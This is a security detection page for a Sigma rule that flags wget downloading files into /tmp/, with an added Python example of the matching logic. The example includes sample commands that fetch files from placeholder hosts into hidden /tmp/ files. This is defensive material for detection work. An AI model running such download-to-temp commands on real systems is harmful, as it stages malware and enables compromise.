Download File To Potentially Suspicious Directory Via Wget

Sigma Rules

Summary
This detection rule identifies instances where the wget utility downloads a file into a suspicious directory, specifically /tmp/ on Linux systems. Using wget to fetch resources can indicate malicious activity, particularly when the files land in temporary locations that users and administrators often overlook. The rule matches process creation events whose command line contains an output flag ('-O' or '--output-document') together with '/tmp/', a combination suggesting that the downloaded file may be used to compromise the system. It aims to surface Command and Control (C2) behaviour associated with malware such as GobRAT, which has been documented in several security blogs. False positives can arise from legitimate system activity, in particular unknown scripts or processes that also use wget this way.
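The selection logic the summary describes, run over a few constructed process creation events, as an added example that is not the Sigma rule's own file: the field names Image and CommandLine follow Sigma's process_creation convention, and Sigma's default case-insensitive string matching is assumed, which is what lets the lowercase '-o' (wget's log-file flag) trigger the rule.

```python
# Added example (not the Sigma project's code): mirrors the rule's process_creation
# selection over constructed events using Sigma's field names Image and CommandLine.
from typing import Dict, List

# Sigma 'contains' matching is case-insensitive by default, so '-O' also hits '-o'.
OUTPUT_FLAGS = ("-o", "--output-document")
SUSPICIOUS_DIR = "/tmp/"


def matches_wget_to_tmp(event: Dict[str, str]) -> bool:
    """True when a process_creation event satisfies the rule's selection."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return (
        image.endswith("/wget")
        and any(flag in cmd for flag in OUTPUT_FLAGS)
        and SUSPICIOUS_DIR in cmd
    )


def alert_on(events: List[Dict[str, str]]) -> List[str]:
    """Return the CommandLine of every matching event, in input order."""
    return [e["CommandLine"] for e in events if matches_wget_to_tmp(e)]


# Constructed sample events (not real telemetry); hostnames are placeholders.
SAMPLE_EVENTS = [
    # 1: download into /tmp with -O: the behaviour the rule targets -> match
    {"Image": "/usr/bin/wget", "CommandLine": "wget -O /tmp/.x http://example.invalid/x"},
    # 2: long-form flag, same outcome -> match
    {"Image": "/usr/bin/wget", "CommandLine": "wget --output-document=/tmp/upd.sh http://example.invalid/u"},
    # 3: same download via curl: outside this rule's scope -> no match
    {"Image": "/usr/bin/curl", "CommandLine": "curl -o /tmp/.x http://example.invalid/x"},
    # 4: wget into the home directory: no /tmp/ -> no match
    {"Image": "/usr/bin/wget", "CommandLine": "wget -O /home/user/file.tar.gz http://example.invalid/f"},
    # 5: lowercase -o is wget's *log file* flag; case-insensitive matching still
    #    fires, one source of the false positives the summary mentions -> match
    {"Image": "/usr/bin/wget", "CommandLine": "wget -o /tmp/wget.log http://example.invalid/f"},
]

if __name__ == "__main__":
    for cmd in alert_on(SAMPLE_EVENTS):
        print("ALERT:", cmd)
```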
Categories
  • Linux
  • Endpoint
  • Cloud
  • Infrastructure
Data Sources
  • Process
  • Command
  • File
Created: 2023-06-02